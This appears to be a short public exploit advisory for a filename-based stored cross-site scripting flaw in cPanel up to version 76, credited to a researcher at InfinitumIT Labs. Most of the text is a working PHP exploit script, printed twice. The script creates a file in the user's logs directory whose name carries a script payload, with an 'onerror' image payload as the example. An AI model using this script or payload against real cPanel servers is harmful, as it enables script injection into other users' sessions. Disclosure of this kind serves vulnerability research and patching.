[+] Title: cPanel Filename Based Stored XSS <= v76 [+] Author: Numan OZDEMIR [+] Vendor Homepage: cpanel.com [+] Version: Up to v76. [+] Discovered by Numan OZDEMIR in InfinitumIT Labs [+] root@numanozdemir.com - info@infinitumit.com.tr [~] Description: Attacker can run JavaScript codes on this page: http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html [~] How to Reproduce: Create a file as named with your payload in /home/user/logs directory or run this php exploit: <center> <?php $p = $_POST['payload']; $x = get_current_user(); $dir = "/home/".$x."/logs/"; if($_POST){ if(touch($dir.$p)){ die(' Successfully exploited. Visit <br> http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html '); }else{ die('An error occured.'); } }else{ echo 'Enter your payload: <form action="" method="post"><input type="text" name="payload" placeholder="<img src onerror=alert(2)>"> <input type="submit" value=">>"></form>'; } // end of the script. ?> Note: You cant create a file as named with / (slash) character by this exploit. This vulnerability is disclosed by cPanel Team's confirmation. // for secure days...<center> <?php $p = $_POST['payload']; $x = get_current_user(); $dir = "/home/".$x."/logs/"; if($_POST){ if(touch($dir.$p)){ die(' Successfully exploited. Visit <br> http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html '); }else{ die('An error occured.'); } }else{ echo 'Enter your payload: <form action="" method="post"><input type="text" name="payload" placeholder="<img src onerror=alert(2)>"> <input type="submit" value=">>"></form>'; } // end of the script. ?>